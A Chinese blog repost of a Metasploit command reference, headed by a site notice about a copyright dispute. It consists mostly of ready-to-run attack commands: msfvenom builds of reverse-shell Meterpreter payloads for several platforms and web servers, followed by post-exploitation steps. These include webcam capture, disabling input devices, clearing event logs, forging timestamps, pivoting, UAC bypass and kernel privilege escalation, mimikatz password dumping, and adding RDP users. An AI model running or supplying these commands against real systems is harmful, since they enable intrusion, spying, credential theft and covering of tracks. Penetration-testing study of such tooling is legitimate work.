当前位置 博文首页 > 文章内容

    MSF命令大全详解

    作者:糖丝橙 栏目:最新动态时讯 时间:2020-04-29 15:54:25

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!



    1|1Windows·Linux

    Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

    1|2Web

    PHP: msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php

    ASP: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp 

    JSP: 
    msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp 
    WAR: 
    msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

    1|3Android

    Android: msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk

    2|00x01 msfvenom命令参数:

    1 Options:

    2 -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定

    3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

    4 -n, --nopsled <length> 为payload预先指定一个NOP滑动长度

    5 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

    6 -e, --encoder [encoder] 指定需要使用的encoder(编码器)

    7 -a, --arch <architecture> 指定payload的目标架构

    8 --platform <platform> 指定payload的目标平台

    9 -s, --space <length> 设定有效攻击荷载的最大长度

    10 -b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;

    11 -i, --iterations <count> 指定payload的编码次数

    12 -c, --add-code <path> 指定一个附加的win32 shellcode文件

    13 -x, --template <path> 指定一个自定义的可执行文件作为模板

    14 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

    15 --payload-options 列举payload的标准选项

    16 -o, --out <path> 保存payload

    17 -v, --var-name <name> 指定一个自定义的变量,以确定输出格式

    18 --shellest 最小化生成payload

    19 -h, --help 查看帮助选项

    20 --help-formats 查看msf支持的输出格式列表

    3|00x02 常用系统命令

    sessions #sessions –h 查看帮助

    sessions -i <ID值> #进入会话 -k 杀死会话

    background #将当前会话放置后台

    run #执行已有的模块,输入run后按两下tab,列出已有的脚本

    info #查看已有模块信息

    getuid # 查看权限

    getpid # 获取当前进程的pid

    sysinfo # 查看目标机系统信息

    ps # 查看当前活跃进程

    kill <PID值> 杀死进程

    idletime #查看目标机闲置时间

    reboot / shutdown #重启/关机

    shell #进入目标机cmd shell

    3|1uictl开关键盘/鼠标

    uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标

    uictl disable mouse #禁用鼠标

    uictl disable keyboard #禁用键盘

    3|2webcam摄像头命令

    webcam_list #查看摄像头

    webcam_snap #通过摄像头拍照

    webcam_stream #通过摄像头开启视频

    3|3execute执行文件

    execute #在目标机中执行文件

    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

    3|4migrate进程迁移

    getpid # 获取当前进程的pid

    ps # 查看当前活跃进程

    migrate <pid值> #将Meterpreter会话移植到指定pid值进程中

    kill <pid值> #杀死进程

    3|5clearev清除日志

    clearev #清除windows中的应用程序日志、系统日志、安全日志

    4|00x03 文件类命令

    4|1基本文件系统命令

    getwd 或者pwd # 查看当前工作目录

    ls

    cd search -f *pass* # 搜索文件 -h查看帮助

    cat c:\\lltest\\lltestpasswd.txt # 查看文件内容

    upload /tmp/hack.txt C:\\lltest # 上传文件到目标机上

    download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上

    edit c:\\1.txt #编辑或创建文件 没有的话,会新建文件

    rm C:\\lltest\\hack.txt mkdir lltest2 #只能在当前目录下创建文件夹

    rmdir lltest2 #只能删除当前目录下文件夹

    getlwd 或者 lpwd #操作攻击者主机 查看当前目录

    lcd /tmp #操作攻击者主机 切换目录

    4|2timestomp伪造时间戳

    timestomp C:// -h #查看帮助

    timestomp -v C://2.txt #查看时间戳

    timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt

    5|00x04 网络类命令

    5|1基本网络命令

    ipconfig/ifconfig

    netstat–ano

    arp

    getproxy #查看代理信息 route #查看路由

    5|2portfwd端口转发

    portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

    5|3autoroute添加路由

    run autoroute –h #查看帮助

    run autoroute -s 192.168.159.0/24 #添加到目标环境网络

    run autoroute –p #查看添加的路由

    5|4利用arp_scanner、portscan等进行扫描

    run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 #扫描192.168.1.0/24这个网段

    run auxiliary/scanner/portscan/tcp RHOSTS=192.168.1.144 PORTS=3389 #检测192.168.1.144是否开启3389端口

    5|5Socks4a代理

    autoroute添加完路由后,还可以利用msf自带的sock4a模块进行Socks4a代理

    msf> use auxiliary/server/socks4a

    msf > set srvhost 127.0.0.1

    msf > set srvport 1080

    msf > run
    然后vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080

    最后proxychains 使用Socks4a代理访

    6|00x05 信息收集

    6|1信息收集的脚本位于:

    /usr/share/metasploit-framework/modules/post/windows/gather

    /usr/share/metasploit-framework/modules/post/linux/gather

    6|2信息收集的脚本较多,仅列几个常用的:

    run post/windows/gather/checkvm #是否虚拟机

    run post/linux/gather/checkvm #是否虚拟机

    run post/windows/gather/forensics/enum_drives #查看分区

    run post/windows/gather/enum_applications #获取安装软件信息

    run post/windows/gather/dumplinks #获取最近的文件操作

    run post/windows/gather/enum_ie #获取IE缓存

    run post/windows/gather/enum_chrome #获取Chrome缓存

    run post/windows/gather/enum_patches #补丁信息

    run post/windows/gather/enum_domain #查找域控

    7|00x06 提权

    7|1getsystem提权

    getsystem

    getsystem工作原理:
    getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
    getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
    Windows服务已启动,导致与命名管道建立连接。
    该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
    然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

    7|2bypassuac

    内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

    use exploit/windows/local/bypassuac

    use exploit/windows/local/bypassuac_injection

    use windows/local/bypassuac_vbs use windows/local/ask

    如使用bypassuac.rb脚本:

    msf > use exploit/windows/local/bypassuac

    msf > set SESSION 2

    msf > run

    7|3内核漏洞提权

    可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权

    meterpreter > run post/windows/gather/enum_patches #查看补丁信息

    msf > use exploit/windows/local/ms13_053_schlamperei

    msf > set SESSION 2

    msf > exploit

    8|00x07 mimikatz抓取密码

    load mimikatz #help mimikatz 查看帮助

    wdigest #获取Wdigest密码

    mimikatz_command -f samdump::hashes #执行mimikatz原始命令

    mimikatz_command -f sekurlsa::searchPasswords

    9|00x08 远程桌面&截屏

    enumdesktops #查看可用的桌面

    getdesktop #获取当前meterpreter 关联的桌面

    set_desktop #设置meterpreter关联的桌面 -h查看帮助

    screenshot #截屏

    use espia #或者使用espia模块截屏 然后输入screengrab

    run vnc #使用vnc远程桌面连接

    10|00x09 开启rdp&添加用户

    10|1getgui命令

    run getgui –h #查看帮助

    run getgui -e #开启远程桌面

    run getgui -u lltest2 -p 123456 #添加用户

    run getgui -f 6661 –e #3389端口转发到6661
    getgui 系统不推荐,推荐使用run post/windows/manage/enable_rdp
    getgui添加用户时,有时虽然可以成功添加用户,但是没有权限通过远程桌面登陆

     


    文章来源:博客园

    原文链接:https://www.cnblogs.com/thespace/p/12802485.html

    如有侵权,请联系本人删除